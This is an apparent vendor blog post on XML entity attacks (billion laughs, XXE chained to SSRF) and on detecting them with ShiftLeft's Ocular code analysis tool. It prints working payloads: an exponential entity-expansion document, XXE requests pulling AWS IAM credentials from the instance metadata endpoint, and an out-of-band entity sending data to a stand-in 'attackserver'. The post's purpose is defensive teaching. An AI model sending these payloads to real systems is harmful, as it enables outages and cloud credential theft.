Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular

Chetan Conikee
5 min readOct 10, 2019

A significant number of enterprises use XML as a data exchange format. XML is the de-facto standard for exchanging messages between enterprise applications in a Services Oriented Architecture. Messages that conform to the canonical model are converted back and forth to XML.

If you have ever worked in an enterprise context you know that life there isn’t simple and neither is the type you of data and its relationships you come across. This is an environment where XML shines as a data format with an extensible schema to represent complex business processes in the real world.

Many industry standards have evolved over the years that are based on XML. Years of work and expertise have gone into these standards. In particular, this is the case in finance (ESMA TRACE, MIFID, XBRL), retail, healthcare (HL7), life sciences (CDISC), and public sector (EU) just to name a few. In the publishing industry, XML is used throughout the document processing workflow. It is also the standard for Office file formats such as Word, Excel, PowerPoint or the Google Docs equivalents.

XIE (XML Internal Entity) Attack — LOL! based Denial Of Service

The body in an XML document does not support special characters (<, &). In order to accommodate for this, one would need to define an entity reference (&lt; &amp;) in a specified section defined in the specification.

<!DOCTYPE biz [    
<!ENTITY dry "Don't Repeat Yourself" > <!-- definition -->
]><text>&dry;</text> <!-- usage -->

All we need to do is to write the doctype declaration and define the custom entity in it. After that, we can use our new internal entity in an XML document. As a result, the parser will replace every &dry; occurrence with ‘Don’t Repeat Yourself’ text. Unfortunately, this feature puts us in danger.

Let’s look at the very simple, yet dangerous denial of service (DoS) attack called the Billion laughs attack.

In order to carry out the attack, you need to prepare malicious XML using internal entities and use it as an input.

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
<!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
<!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
<!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
<!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
<!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
<!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
<!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">
]>
<attack>&loli;</attack>

When an XML parser loads this document, it will try to resolve the loli entity. At first, loli expands to ten lolh entities, each lolg expands to ten lolf entities and so on. As a result, we get 1 billion “lol” strings.

This imposes a huge burden on the hosting compute resources, which can severely impede application responsiveness! (exponential memory consumption of xGB per minute leading to kernel panic)

XXE (XML External Entity) Attack chained to SSRF (Server Side Request Forgery)— Metadata exfiltration

Entities can also be imported from external URIs and can lead to XXE attacks.

<!DOCTYPE xxe [       
<!ENTITY externalEntity SYSTEM “ADD URI HERE”>
]>

Let’s use an example to illustrate this. Imagine that we have two endpoints:

1. One for listing all posts and other
2. For creating new posts.

With this in mind, we can prepare malicious XML input and use the endpoint to create a new post. The input data could look like this:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY externalEntity SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials">
]>
<foo>
&externalEntity;
</foo>

In a subsequent iteration, we can use another endpoint to list all posts. If the attack succeeds, the response will look like this:

ApplicationRole

By concatenating the role (received in response to prior iteration) the attacker will be able to retrieve access, secret, and session token keys of hosting cloud provider.

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY externalEntity SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials/ApplicationRole">
]>
<foo>
&externalEntity;
</foo>

If the attack succeeds, the response will look like this:

{   
"Code" : "Success",
"LastUpdated" : "2018-01-25T23:15:40Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKJBD787XXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXX",
"Token" : "ZXXXXXXXXXX",
"Expiration" : "2018-01-26T05:40:31Z"
}

As you can see, this is really dangerous and can lead to serious security problems!

What if there is only an API to create and not list information? This would impede an attacker from receiving feedback or a response reflectively.

You might think you are safe, but that’s not true. Instead of providing the file with external entity definition, the attacker can register an endpoint that listens to every request and logs results.

<!ENTITY % paramEntityDefiningExternalEntity '<!ENTITY sniffTraffic SYSTEM "http://attackserver/sniff_log?%result;">'><!DOCTYPE xxe [
<!ENTITY % paramEntity SYSTEM "URI to file with parameter entity definitions" >
%paramEntity;
%paramEntityDefiningExternalEntity;
] ><post author="consumer" topic="XXE" content="&sniffTraffic;" />

Safe Coding to prevent XXE Chaining

Most Java XML parsers have XXE enabled by default. Listed below is a code snippet that has taken necessary precaution to prevent XIE and XXE based attacks.

The precaution measures takes into account different version of JDK runtime by setting appropriate features that can collectively prevent an XXE/XIE attack across disparate versions and runtimes.

Can these safe coding checks be verified using Ocular ?

Yes. Using Ocular’s data flow tracking, the following checks can be performed to ensure that there is no risk of XXE/XIE attack

  1. Identify untrusted attacker-controlled vector content , in this case
  2. Mark DocumentBuilderFactory.newInstance() as a source in the data flow
  3. Mark builder.parse(new ByteArrayInputStream(content.getBytes())) as sink
  4. Conduct reachability analysis between source and sink that is influenced by attacker-controlled vector
  5. Conduct verification by using Ocular’s passes construct to ensure that all safety features are enabled (as prescribed above) in the data flow before attacker-controlled vector touches the sensitive sink originating at the source.

ShiftLeft’s Ocular is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws and insider attacks that might exist in your application’s codebase.

The following POC codebase https://github.com/conikeec/tarpit/blob/master/src/main/java/io/shiftleft/tarpit/DocumentTarpit.java is evaluated for this seeded condition.

Specified below is a detailed investigation log to detect XXE chaining to DOS (LOL based) or SSRF. Criteria for validation can also be evaluated to ensure that the conclusion is a true positive.

If you’d like to learn more about ShiftLeft’s Code Property Graph, and Ocular and how it can be used to help identify XXE+SSRF or XXE+DOS, please request a demo.

Happy Hunting and Hacking !

--

--

Chetan Conikee

Engineer, InfoSec tinkerer, Seed Investor, Founder/CTO of ShiftLeft Inc., (Opinions, my own)